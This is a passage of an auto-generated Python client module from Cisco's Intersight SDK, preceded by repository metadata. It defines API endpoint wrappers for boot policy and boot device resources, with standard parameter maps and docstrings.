| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
cb605d73e63aa6aeef85f709d7feca503a1d43aa
| 393,603
|
py
|
Python
|
intersight/api/boot_api.py
|
CiscoDevNet/intersight-python
|
04b721f37c3044646a91c185c7259edfb991557a
|
[
"Apache-2.0"
] | 5
|
2021-12-16T15:13:32.000Z
|
2022-03-29T16:09:54.000Z
|
intersight/api/boot_api.py
|
CiscoDevNet/intersight-python
|
04b721f37c3044646a91c185c7259edfb991557a
|
[
"Apache-2.0"
] | 4
|
2022-01-25T19:05:51.000Z
|
2022-03-29T20:18:37.000Z
|
intersight/api/boot_api.py
|
CiscoDevNet/intersight-python
|
04b721f37c3044646a91c185c7259edfb991557a
|
[
"Apache-2.0"
] | 2
|
2020-07-07T15:01:08.000Z
|
2022-01-31T04:27:35.000Z
|
"""
Cisco Intersight
Cisco Intersight is a management platform delivered as a service with embedded analytics for your Cisco and 3rd party IT infrastructure. This platform offers an intelligent level of management that enables IT organizations to analyze, simplify, and automate their environments in more advanced ways than the prior generations of tools. Cisco Intersight provides an integrated and intuitive management experience for resources in the traditional data center as well as at the edge. With flexible deployment options to address complex security needs, getting started with Intersight is quick and easy. Cisco Intersight has deep integration with Cisco UCS and HyperFlex systems allowing for remote deployment, configuration, and ongoing maintenance. The model-based deployment works for a single system in a remote location or hundreds of systems in a data center and enables rapid, standardized configuration and deployment. It also streamlines maintaining those systems whether you are working with small or very large configurations. The Intersight OpenAPI document defines the complete set of properties that are returned in the HTTP response. From that perspective, a client can expect that no additional properties are returned, unless these properties are explicitly defined in the OpenAPI document. However, when a client uses an older version of the Intersight OpenAPI document, the server may send additional properties because the software is more recent than the client. In that case, the client may receive properties that it does not know about. Some generated SDKs perform a strict validation of the HTTP response body against the OpenAPI document. # noqa: E501
The version of the OpenAPI document: 1.0.9-4950
Contact: intersight@cisco.com
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from intersight.api_client import ApiClient, Endpoint as _Endpoint
from intersight.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from intersight.model.boot_cdd_device import BootCddDevice
from intersight.model.boot_cdd_device_response import BootCddDeviceResponse
from intersight.model.boot_device_boot_mode import BootDeviceBootMode
from intersight.model.boot_device_boot_mode_response import BootDeviceBootModeResponse
from intersight.model.boot_device_boot_security import BootDeviceBootSecurity
from intersight.model.boot_device_boot_security_response import BootDeviceBootSecurityResponse
from intersight.model.boot_hdd_device import BootHddDevice
from intersight.model.boot_hdd_device_response import BootHddDeviceResponse
from intersight.model.boot_iscsi_device import BootIscsiDevice
from intersight.model.boot_iscsi_device_response import BootIscsiDeviceResponse
from intersight.model.boot_nvme_device import BootNvmeDevice
from intersight.model.boot_nvme_device_response import BootNvmeDeviceResponse
from intersight.model.boot_pch_storage_device import BootPchStorageDevice
from intersight.model.boot_pch_storage_device_response import BootPchStorageDeviceResponse
from intersight.model.boot_precision_policy import BootPrecisionPolicy
from intersight.model.boot_precision_policy_response import BootPrecisionPolicyResponse
from intersight.model.boot_pxe_device import BootPxeDevice
from intersight.model.boot_pxe_device_response import BootPxeDeviceResponse
from intersight.model.boot_san_device import BootSanDevice
from intersight.model.boot_san_device_response import BootSanDeviceResponse
from intersight.model.boot_sd_device import BootSdDevice
from intersight.model.boot_sd_device_response import BootSdDeviceResponse
from intersight.model.boot_uefi_shell_device import BootUefiShellDevice
from intersight.model.boot_uefi_shell_device_response import BootUefiShellDeviceResponse
from intersight.model.boot_usb_device import BootUsbDevice
from intersight.model.boot_usb_device_response import BootUsbDeviceResponse
from intersight.model.boot_vmedia_device import BootVmediaDevice
from intersight.model.boot_vmedia_device_response import BootVmediaDeviceResponse
from intersight.model.error import Error
class BootApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def __create_boot_precision_policy(
self,
boot_precision_policy,
**kwargs
):
"""Create a 'boot.PrecisionPolicy' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_boot_precision_policy(boot_precision_policy, async_req=True)
>>> result = thread.get()
Args:
boot_precision_policy (BootPrecisionPolicy): The 'boot.PrecisionPolicy' resource to create.
Keyword Args:
if_match (str): For methods that apply server-side changes, and in particular for PUT, If-Match can be used to prevent the lost update problem. It can check if the modification of a resource that the user wants to upload will not override another change that has been done since the original resource was fetched. If the request cannot be fulfilled, the 412 (Precondition Failed) response is returned. When modifying a resource using POST or PUT, the If-Match header must be set to the value of the resource ModTime property after which no lost update problem should occur. For example, a client send a GET request to obtain a resource, which includes the ModTime property. The ModTime indicates the last time the resource was created or modified. The client then sends a POST or PUT request with the If-Match header set to the ModTime property of the resource as obtained in the GET request.. [optional]
if_none_match (str): For methods that apply server-side changes, If-None-Match used with the * value can be used to create a resource not known to exist, guaranteeing that another resource creation didn't happen before, losing the data of the previous put. The request will be processed only if the eventually existing resource's ETag doesn't match any of the values listed. Otherwise, the status code 412 (Precondition Failed) is used. The asterisk is a special value representing any resource. It is only useful when creating a resource, usually with PUT, to check if another resource with the identity has already been created before. The comparison with the stored ETag uses the weak comparison algorithm, meaning two resources are considered identical if the content is equivalent - they don't have to be identical byte for byte.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootPrecisionPolicy
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['boot_precision_policy'] = \
boot_precision_policy
return self.call_with_http_info(**kwargs)
self.create_boot_precision_policy = _Endpoint(
settings={
'response_type': (BootPrecisionPolicy,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/PrecisionPolicies',
'operation_id': 'create_boot_precision_policy',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'boot_precision_policy',
'if_match',
'if_none_match',
],
'required': [
'boot_precision_policy',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'boot_precision_policy':
(BootPrecisionPolicy,),
'if_match':
(str,),
'if_none_match':
(str,),
},
'attribute_map': {
'if_match': 'If-Match',
'if_none_match': 'If-None-Match',
},
'location_map': {
'boot_precision_policy': 'body',
'if_match': 'header',
'if_none_match': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__create_boot_precision_policy
)
def __delete_boot_precision_policy(
self,
moid,
**kwargs
):
"""Delete a 'boot.PrecisionPolicy' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_boot_precision_policy(moid, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
return self.call_with_http_info(**kwargs)
self.delete_boot_precision_policy = _Endpoint(
settings={
'response_type': None,
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/PrecisionPolicies/{Moid}',
'operation_id': 'delete_boot_precision_policy',
'http_method': 'DELETE',
'servers': None,
},
params_map={
'all': [
'moid',
],
'required': [
'moid',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
},
'attribute_map': {
'moid': 'Moid',
},
'location_map': {
'moid': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__delete_boot_precision_policy
)
def __get_boot_cdd_device_by_moid(
self,
moid,
**kwargs
):
"""Read a 'boot.CddDevice' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_boot_cdd_device_by_moid(moid, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootCddDevice
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
return self.call_with_http_info(**kwargs)
self.get_boot_cdd_device_by_moid = _Endpoint(
settings={
'response_type': (BootCddDevice,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/CddDevices/{Moid}',
'operation_id': 'get_boot_cdd_device_by_moid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'moid',
],
'required': [
'moid',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
},
'attribute_map': {
'moid': 'Moid',
},
'location_map': {
'moid': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_boot_cdd_device_by_moid
)
def __get_boot_cdd_device_list(
self,
**kwargs
):
"""Read a 'boot.CddDevice' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_boot_cdd_device_list(async_req=True)
>>> result = thread.get()
Keyword Args:
filter (str): Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).. [optional] if omitted the server will use the default value of ""
orderby (str): Determines what properties are used to sort the collection of resources.. [optional]
top (int): Specifies the maximum number of resources to return in the response.. [optional] if omitted the server will use the default value of 100
skip (int): Specifies the number of resources to skip in the response.. [optional] if omitted the server will use the default value of 0
select (str): Specifies a subset of properties to return.. [optional] if omitted the server will use the default value of ""
expand (str): Specify additional attributes or related resources to return in addition to the primary resources.. [optional]
apply (str): Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.. [optional]
count (bool): The $count query specifies the service should return the count of the matching resources, instead of returning the resources.. [optional]
inlinecount (str): The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.. [optional] if omitted the server will use the default value of "allpages"
at (str): Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.. [optional]
tags (str): The 'tags' parameter is used to request a summary of the Tag utilization for this resource. When the 'tags' parameter is specified, the response provides a list of tag keys, the number of times the key has been used across all documents, and the tag values that have been assigned to the tag key.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootCddDeviceResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_boot_cdd_device_list = _Endpoint(
settings={
'response_type': (BootCddDeviceResponse,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/CddDevices',
'operation_id': 'get_boot_cdd_device_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'filter',
'orderby',
'top',
'skip',
'select',
'expand',
'apply',
'count',
'inlinecount',
'at',
'tags',
],
'required': [],
'nullable': [
],
'enum': [
'inlinecount',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('inlinecount',): {
"ALLPAGES": "allpages",
"NONE": "none"
},
},
'openapi_types': {
'filter':
(str,),
'orderby':
(str,),
'top':
(int,),
'skip':
(int,),
'select':
(str,),
'expand':
(str,),
'apply':
(str,),
'count':
(bool,),
'inlinecount':
(str,),
'at':
(str,),
'tags':
(str,),
},
'attribute_map': {
'filter': '$filter',
'orderby': '$orderby',
'top': '$top',
'skip': '$skip',
'select': '$select',
'expand': '$expand',
'apply': '$apply',
'count': '$count',
'inlinecount': '$inlinecount',
'at': 'at',
'tags': 'tags',
},
'location_map': {
'filter': 'query',
'orderby': 'query',
'top': 'query',
'skip': 'query',
'select': 'query',
'expand': 'query',
'apply': 'query',
'count': 'query',
'inlinecount': 'query',
'at': 'query',
'tags': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_boot_cdd_device_list
)
def __get_boot_device_boot_mode_by_moid(
self,
moid,
**kwargs
):
"""Read a 'boot.DeviceBootMode' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_boot_device_boot_mode_by_moid(moid, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootDeviceBootMode
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
return self.call_with_http_info(**kwargs)
self.get_boot_device_boot_mode_by_moid = _Endpoint(
settings={
'response_type': (BootDeviceBootMode,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/DeviceBootModes/{Moid}',
'operation_id': 'get_boot_device_boot_mode_by_moid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'moid',
],
'required': [
'moid',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
},
'attribute_map': {
'moid': 'Moid',
},
'location_map': {
'moid': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_boot_device_boot_mode_by_moid
)
def __get_boot_device_boot_mode_list(
self,
**kwargs
):
"""Read a 'boot.DeviceBootMode' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_boot_device_boot_mode_list(async_req=True)
>>> result = thread.get()
Keyword Args:
filter (str): Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).. [optional] if omitted the server will use the default value of ""
orderby (str): Determines what properties are used to sort the collection of resources.. [optional]
top (int): Specifies the maximum number of resources to return in the response.. [optional] if omitted the server will use the default value of 100
skip (int): Specifies the number of resources to skip in the response.. [optional] if omitted the server will use the default value of 0
select (str): Specifies a subset of properties to return.. [optional] if omitted the server will use the default value of ""
expand (str): Specify additional attributes or related resources to return in addition to the primary resources.. [optional]
apply (str): Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.. [optional]
count (bool): The $count query specifies the service should return the count of the matching resources, instead of returning the resources.. [optional]
inlinecount (str): The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.. [optional] if omitted the server will use the default value of "allpages"
at (str): Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.. [optional]
tags (str): The 'tags' parameter is used to request a summary of the Tag utilization for this resource. When the 'tags' parameter is specified, the response provides a list of tag keys, the number of times the key has been used across all documents, and the tag values that have been assigned to the tag key.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootDeviceBootModeResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_boot_device_boot_mode_list = _Endpoint(
settings={
'response_type': (BootDeviceBootModeResponse,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/DeviceBootModes',
'operation_id': 'get_boot_device_boot_mode_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'filter',
'orderby',
'top',
'skip',
'select',
'expand',
'apply',
'count',
'inlinecount',
'at',
'tags',
],
'required': [],
'nullable': [
],
'enum': [
'inlinecount',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('inlinecount',): {
"ALLPAGES": "allpages",
"NONE": "none"
},
},
'openapi_types': {
'filter':
(str,),
'orderby':
(str,),
'top':
(int,),
'skip':
(int,),
'select':
(str,),
'expand':
(str,),
'apply':
(str,),
'count':
(bool,),
'inlinecount':
(str,),
'at':
(str,),
'tags':
(str,),
},
'attribute_map': {
'filter': '$filter',
'orderby': '$orderby',
'top': '$top',
'skip': '$skip',
'select': '$select',
'expand': '$expand',
'apply': '$apply',
'count': '$count',
'inlinecount': '$inlinecount',
'at': 'at',
'tags': 'tags',
},
'location_map': {
'filter': 'query',
'orderby': 'query',
'top': 'query',
'skip': 'query',
'select': 'query',
'expand': 'query',
'apply': 'query',
'count': 'query',
'inlinecount': 'query',
'at': 'query',
'tags': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_boot_device_boot_mode_list
)
def __get_boot_device_boot_security_by_moid(
self,
moid,
**kwargs
):
"""Read a 'boot.DeviceBootSecurity' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_boot_device_boot_security_by_moid(moid, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootDeviceBootSecurity
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
return self.call_with_http_info(**kwargs)
self.get_boot_device_boot_security_by_moid = _Endpoint(
settings={
'response_type': (BootDeviceBootSecurity,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/DeviceBootSecurities/{Moid}',
'operation_id': 'get_boot_device_boot_security_by_moid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'moid',
],
'required': [
'moid',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
},
'attribute_map': {
'moid': 'Moid',
},
'location_map': {
'moid': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_boot_device_boot_security_by_moid
)
def __get_boot_device_boot_security_list(
self,
**kwargs
):
"""Read a 'boot.DeviceBootSecurity' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_boot_device_boot_security_list(async_req=True)
>>> result = thread.get()
Keyword Args:
filter (str): Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).. [optional] if omitted the server will use the default value of ""
orderby (str): Determines what properties are used to sort the collection of resources.. [optional]
top (int): Specifies the maximum number of resources to return in the response.. [optional] if omitted the server will use the default value of 100
skip (int): Specifies the number of resources to skip in the response.. [optional] if omitted the server will use the default value of 0
select (str): Specifies a subset of properties to return.. [optional] if omitted the server will use the default value of ""
expand (str): Specify additional attributes or related resources to return in addition to the primary resources.. [optional]
apply (str): Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.. [optional]
count (bool): The $count query specifies the service should return the count of the matching resources, instead of returning the resources.. [optional]
inlinecount (str): The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.. [optional] if omitted the server will use the default value of "allpages"
